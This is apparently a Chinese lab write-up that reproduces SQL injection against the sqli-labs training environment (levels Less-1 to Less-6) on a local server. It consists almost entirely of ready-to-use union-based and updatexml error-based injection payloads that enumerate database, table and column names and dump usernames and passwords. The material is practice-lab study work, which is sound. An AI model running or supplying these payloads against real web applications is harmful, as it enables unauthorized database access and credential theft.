SQL注入漏洞复现1

一、靶场信息

sqli-labs下载：https://github.com/Audi-1/sqli-labs

phpstudy下载地址：http://down.php.cn/PhpStudy20180211.zip

我是在本地安装小皮搭建环境，相比于在服务器上搭建环境，更加简单

二、注入实操

Less-1

爆库名：http://127.0.0.1:100/Less-1/?id=-1' union select 1,2,database()--+

爆表名：?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

爆列名：?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

爆数据：?id=-1'union select 1,group_concat(username,0x3a,password),3 from users--+

Less-2

爆库名：?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata --+

?id=-1 union select 1,2,database()--+

爆表名：?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

爆列名：?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

爆数据：?id=-1 union select 1,group_concat(username,0x3a,password),3 from users--+

Less-3

爆库名：?id=-1')  union select 1,2,group_concat(schema_name) from information_schema.schemata --+

?id=-1') union select 1,2,database()--+

爆表名：?id=-1')  union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

爆列名：?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

爆数据：?id=-1') union select 1,group_concat(username,0x3a,password),3 from users--+

Less-4

爆库名：?id=-1") union select 1,2,group_concat(schema_name) from information_schema.schemata --+

?id=-1") union select 1,2,database()--+

爆表名：?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

爆列名：?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

爆数据：?id=-1") union select 1,group_concat(username,0x3a,password),3 from users--+

Less-5

爆库名：?id=1' and updatexml(1,concat(0x7e,database(), 0x7e),1)--+

爆表名：?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'), 0x7e),1)--+

字符过长，显示不全，使用substr函数进行截取：

?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(table_name)from information_schema.tables where table_schema='security'),1,32), 0x7e),1)--+

爆列名：?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'), 0x7e),1)--+

爆数据：?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password)from users),0x7e),1)--+

字符过长，显示不全，使用substr函数进行截取：

?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password)from users),32,64),0x7e),1)--+

Less-6

爆库名：?id=1" and updatexml(1,concat(0x7e,database(),0x7e),1)--+

爆表名：?id=1" and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'), 0x7e),1)--+

爆列名：?id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'), 0x7e),1)--+

爆数据：?id=1" and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password)from users),0x7e),1)--+